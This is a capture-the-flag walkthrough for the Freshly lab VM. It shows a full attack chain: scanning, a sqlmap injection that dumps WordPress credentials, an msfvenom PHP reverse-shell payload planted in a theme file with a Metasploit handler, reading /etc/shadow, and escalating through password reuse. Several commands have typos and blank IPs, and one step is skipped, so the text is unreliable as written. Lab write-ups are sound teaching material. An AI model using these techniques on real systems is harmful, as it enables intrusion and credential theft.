Hack the Freshly VM (CTF Challenge)

Here we come with a new article which will all be about a penetration testing challenge called FRESHLY. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. It’s an easy lab… let’s get started with it and access it.
Download from here
So to start with it firstly we have to find out the IP of FRESHLY. For that type the netdiscover command in terminal of Kali. It will show each IP present in our network.

Now we have target IP so let’s scan it with aggressive scan (-A).
nmap -p-  -A

This shows all open ports: 80, 8080, 443.
As we can see 80 port is open so we will open target IP in our browser to find out what’s in there as our next clue.

Next we will apply nikto command to it. Nitko command will help us to gather information like its files and all the other major stuff that we ought to know about our target. So, therefore, type:

After scanning it shows that there is a login.php page found. So open it in a browser with target IP

As we can see there is a login form popped up as a result asking for user and password. So we will capture the cookies using burpsuite. I have given the entries for user as admin and password as 123. You can enter anything you like

I take these parameters and run sqlmap to see if there’s SQLInjection vulnerability we will find it in its Database using sqlmap. And for this type:
Sqlmap –u “” –data=”user=test&password=123&s=Submit” –risk 3 — level 3 –dbs

We have our required database right in front of us. Using sql commands fetch username and password from that database ie wordpress8080

Alright we have achieved our first step by finding out user and password for wordpress.
User = admin
Password = SuperSecretPassword
 Earlier we have already found out our open ports so use one of not used ports to open in browser ie.8080

Cool…See what you have got…. Now click on this link and you are all set for further result.

Candy goodness!!!!!  It’s our wordpress page. So let’s get on to other step by opening wordpress login page and entering the credentials we found out i.e.
User= admin
Password= SuperSecretPassword

Once you have logged in, make the malicious file that you got to upload in it. Generate code through msfvenom command:
Msfvenom –p php/meterpreter/reverse_tcp lhost= lport=4444 –f raw

Side by side in other terminal open metasploit and run handler.
use exploit/multi/handler
uet payload php/meterpreter/reverse_tcp
uet lhost
uet lport 4444

Again going back to our generated php raw file copy the code from <?php to die().
As we want to read a file on the system, let’s put some PHP code in the theme: We go to Appearance -> themes -> 404.php and add some PHP code in order to execute it,

But we are not done yet as the exploit will run it will give you the session of meterpreter. Furthermore type, shell
 Now we need to import the python file to reach the terminal and to do so type:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

Now there might the kernel version that we could exploit so to check its version type;
lsb_release a

When we reload the index page we got the /etc/shadow file in the footer:  We already got the flag! No need to root the system But how did you get root shell, you might ask: ) Here’s the magic:
Account credential reuse from the WordPress admin password SuperSecretPassword allowed su – to escalate privileges

Author: Priya Singh is a enthusiast researcher and technical writer at hacking articles.